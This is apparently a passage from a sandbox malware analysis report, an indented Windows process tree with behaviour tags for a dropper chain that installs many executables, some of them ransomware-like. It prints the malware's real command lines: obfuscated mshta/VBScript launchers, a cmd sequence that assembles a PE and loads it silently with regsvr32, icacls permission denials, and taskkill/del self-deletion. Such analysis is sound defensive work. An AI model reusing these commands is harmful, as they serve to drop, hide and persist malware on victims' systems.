                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:736
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_5.exe
                                                                                                                                                                            arnatic_5.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:3904
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2001765.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2001765.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:1628
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6407267.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6407267.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:3776
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4300
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1696418.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1696418.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:3568
                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            PID:1160
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:4460
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:5652
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                            PID:912
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6A2B.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6A2B.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:6456
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6ECF.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6ECF.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:6552
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C81C.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C81C.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:6948
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CC33.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CC33.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:6964
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D184.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D184.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:6980
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D5DA.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D5DA.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6996
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:7012
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:7036
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7084
                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      PID:7128
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5184
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:6280
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1856
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:6248
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:800
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:6468
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:6324
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:5784
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5BC4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:5032
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5BC4.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\5BC4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Modifies extensions of user files
                                                                                                                                                                                                  PID:1132
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\99e4705a-9e21-4c36-a0f8-d14b6e6614a5\build2.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\99e4705a-9e21-4c36-a0f8-d14b6e6614a5\build2.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\99e4705a-9e21-4c36-a0f8-d14b6e6614a5\build2.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\99e4705a-9e21-4c36-a0f8-d14b6e6614a5\build2.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:4032
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\99e4705a-9e21-4c36-a0f8-d14b6e6614a5\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:5568
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /im build2.exe /f
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:704
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:4752
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5C71.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5C71.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              PID:6464
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 5C71.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5C71.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3836
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    taskkill /im 5C71.exe /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:5164
                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:3260
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5F8F.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5F8F.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4132
                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\5F8F.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\5F8F.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4756
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\5F8F.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\5F8F.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4964
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                                                                                                                          ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5772
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:5116
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:3236
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:7160
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:5704
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:4732
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                              regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                              PID:3920
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill -F -im "5F8F.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:3232
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6CDE.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6CDE.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  PID:68
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7396.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7396.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8GEDT.tmp\7396.tmp
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8GEDT.tmp\7396.tmp" /SL5="$103A8,188175,104448,C:\Users\Admin\AppData\Local\Temp\7396.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:6372
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DGA7B.tmp\134 Vaporeondè_éçè_)))_.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DGA7B.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                        PID:5776
                                                                                                                                                                                                                        • C:\Program Files\Windows Mail\BWPCLGWMUJ\irecord.exe
                                                                                                                                                                                                                          "C:\Program Files\Windows Mail\BWPCLGWMUJ\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6360
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-CR7EI.tmp\irecord.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-CR7EI.tmp\irecord.tmp" /SL5="$40408,5808768,66560,C:\Program Files\Windows Mail\BWPCLGWMUJ\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:6692
                                                                                                                                                                                                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:6884
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6a-710ec-d06-efea3-f171016d5b9b9\Qipeshiwuca.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\6a-710ec-d06-efea3-f171016d5b9b9\Qipeshiwuca.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            PID:5228
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3e-d6518-c9d-ac28f-250ed9507bb52\Cenejabijae.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3e-d6518-c9d-ac28f-250ed9507bb52\Cenejabijae.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:6684
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hcphtmw.k5f\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkp2gdma.1cx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pkbxls2y.bxe\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:768
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pkbxls2y.bxe\Setup3310.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\pkbxls2y.bxe\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:4848
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EARCS.tmp\Setup3310.tmp
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EARCS.tmp\Setup3310.tmp" /SL5="$60304,138429,56832,C:\Users\Admin\AppData\Local\Temp\pkbxls2y.bxe\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                            PID:6868
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-BA1S7.tmp\Setup.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-BA1S7.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:5700
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:4908
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe" end
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:1016
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:4164
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:6140
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:5088
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed0cdkbo.23b\google-game.exe & exit
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:5732
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ed0cdkbo.23b\google-game.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ed0cdkbo.23b\google-game.exe
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:5992
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ed0cdkbo.23b\google-game.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ed0cdkbo.23b\google-game.exe" -a
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jwxezcd0.1s2\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:4724
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jwxezcd0.1s2\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jwxezcd0.1s2\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:4732
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfp1tskq.wvo\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4696
                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:5604
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qrt04ihk.gz2\toolspab1.exe & exit
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:5548
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\qrt04ihk.gz2\toolspab1.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\qrt04ihk.gz2\toolspab1.exe
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:6616
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qrt04ihk.gz2\toolspab1.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\qrt04ihk.gz2\toolspab1.exe
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      PID:60
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0y1dd20b.y5x\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:2240
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0y1dd20b.y5x\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\0y1dd20b.y5x\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                      PID:4456
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:5072
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:6416
                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:7156
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:5192
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:2472
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
